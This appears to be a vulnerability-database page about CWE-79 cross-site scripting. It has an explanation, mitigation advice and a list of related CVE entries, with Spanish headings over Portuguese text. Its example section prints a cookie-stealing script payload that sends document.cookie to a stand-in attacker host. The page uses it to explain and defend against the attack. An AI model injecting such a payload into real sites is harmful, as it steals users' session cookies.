Fallos del tipo CWE-79

29.084 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-47920HIGHTiki Wiki CMS – CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')EPSS 0.5%CVE-2021-36849LOWWordPress Social Media Share Buttons plugin <= 3.8.1 - Authenticated Stored Cross-Site Scripting (XSS) vulnerabilityEPSS 0.5%CVE-2023-2476LOWDromara J2eeFAST Announcement cross site scriptingEPSS 0.5%CVE-2023-1245LOWCross-site Scripting (XSS) - Stored in answerdev/answerEPSS 0.5%CVE-2023-27775MEDIUMA stored HTML injection vulnerability in LiveAction LiveSP v21.1.2 allows attackers to execute arbitrary code via a crafted payload.EPSS 0.5%CVE-2026-40457LOWReflected XSS in LMSEPSS 0.5%CVE-2023-3564LOWGZ Scripts GZ Multi Hotel Booking System index.php cross site scriptingEPSS 0.5%CVE-2024-1960MEDIUMShopLentor <= 2.8.1 - Authenticated(Contributor+) Stored Cross-Site Scripting via Banner LinkEPSS 0.5%CVE-2015-10059LOWs134328 Webapplication-Veganguide apiService.js cross site scriptingEPSS 0.5%CVE-2019-19757MEDIUMAn internal product security audit of Lenovo XClarity Administrator (LXCA) discovered a Document Object Model (DOM) based cross-site scriptiEPSS 0.5%CVE-2015-10058LOWWikisource Category Browser index.php cross site scriptingEPSS 0.5%CVE-2024-12979MEDIUMcode-projects Job Recruitment _all_edits.php cn_update cross site scriptingEPSS 0.5%CVE-2017-5257—In version 3.5 and prior of Cambium Networks ePMP firmware, an attacker who knows (or guesses) the SNMP read/write (RW) community string canEPSS 0.5%CVE-2023-25309MEDIUMCross Site Scripting (XSS) Vulnerability in Fetlife rollout-ui version 0.5, allows attackers to execute arbitrary code via a crafted url to EPSS 0.5%CVE-2023-5706MEDIUMVK Blocks <= 1.63.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via BlockEPSS 0.5%CVE-2024-8151MEDIUMSourceCodester Interactive Map with Marker delete-mark.php cross site scriptingEPSS 0.5%CVE-2022-29428MEDIUMWordPress WP Slider Plugin <= 1.4.5 - Cross-Site Scripting (XSS) vulnerabilityEPSS 0.5%CVE-2019-13935LOWImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webclient of Siemens AG Polarion couldEPSS 0.5%CVE-2023-27069MEDIUMA stored cross-site scripting (XSS) vulnerability in TotalJS OpenPlatform commit b80b09d allows attackers to execute arbitrary web scripts oEPSS 0.5%CVE-2023-2998MEDIUMCross-site Scripting (XSS) - Stored in thorsten/phpmyfaqEPSS 0.5%